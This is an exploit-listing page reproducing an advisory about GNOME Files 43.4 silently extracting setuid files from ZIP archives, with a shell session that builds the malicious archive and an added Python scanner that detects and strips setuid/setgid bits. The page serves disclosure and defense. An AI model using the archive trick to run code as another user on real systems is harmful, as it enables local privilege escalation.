GNOME Files 43.4 Privilege Escalation

CVE: CVE-2021-33625
Category: CWE-269
Price: $10,000
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Local
Date: 2023-08-08
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023080034

Below is a copy:

GNOME Files 43.4 Privilege Escalation
Affected: GNOME Files 43.4 (nautilus) on Fedora 37

Description:

If a user A opens, in GNOME Files, a ZIP archive containing
a `setuid` file F, then F will be silently extracted to
a subdirectory of the CWD.

If F is accessible by a hostile local user B and B executes F,
then F will be executed as user A.

tar(1) and unzip(1) are not vulnerable to this attack.

The following session creates the ZIP.
After that, just open f.zip in GNOME Files.
<pre>
[joro@fedora ~]$ umask
0022
[joro@fedora 2]$ mkdir /tmp/2 ; cd /tmp/2 ; echo hi > F ; chmod +xs F
[joro@fedora 2]$ zip f F ; zipinfo f
Archive:  f.zip
Zip file size: 155 bytes, number of entries: 1
-rwsr-sr-x  3.0 unx        3 tx stor 23-Aug-05 12:38 F
[joro@fedora 2]$ ls -ld /tmp/2/
drwxr-xr-x. 2 joro joro 80 Aug  5 11:20 /tmp/2/
[joro@fedora 2]$
</pre>
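
As a defensive counterpart to the session above, this added example (not part of the original advisory) scans a ZIP's central directory for entries whose stored Unix mode carries setuid or setgid bits, and shows the permission bits a careful extractor would apply instead. The sample archive is constructed in memory to mirror the `-rwsr-sr-x` entry F; the function names are hypothetical.

```python
import io
import stat
import zipfile

SETID_BITS = stat.S_ISUID | stat.S_ISGID  # 0o6000


def unix_mode(info: zipfile.ZipInfo) -> int:
    """Unix st_mode stored for an entry (high 16 bits of external_attr).

    Archives written on non-Unix hosts normally leave these bits at 0.
    """
    return (info.external_attr >> 16) & 0xFFFF


def find_setid_entries(archive) -> list:
    """Return (name, mode string) for each entry with setuid or setgid set."""
    with zipfile.ZipFile(archive) as zf:
        return [(i.filename, stat.filemode(unix_mode(i)))
                for i in zf.infolist() if unix_mode(i) & SETID_BITS]


def safe_modes(archive) -> dict:
    """Map entry name to the mode an extractor should apply.

    Only the rwx bits are kept, so setuid, setgid and sticky are dropped.
    """
    with zipfile.ZipFile(archive) as zf:
        return {i.filename: unix_mode(i) & 0o777 for i in zf.infolist()}


def build_sample() -> io.BytesIO:
    """Constructed sample: F with mode 6755 plus an ordinary 0644 file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, perm in (("F", 0o6755), ("README", 0o644)):
            info = zipfile.ZipInfo(name)
            info.create_system = 3  # mark the entry as written on Unix
            info.external_attr = (stat.S_IFREG | perm) << 16
            zf.writestr(info, "hi\n")
    buf.seek(0)
    return buf


if __name__ == "__main__":
    for name, mode in find_setid_entries(build_sample()):
        print(f"setuid/setgid entry: {name} {mode}")
    print(safe_modes(build_sample()))
```

Running the scan on an untrusted archive before opening it in a file manager shows whether any entry would land on disk with elevated mode bits.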
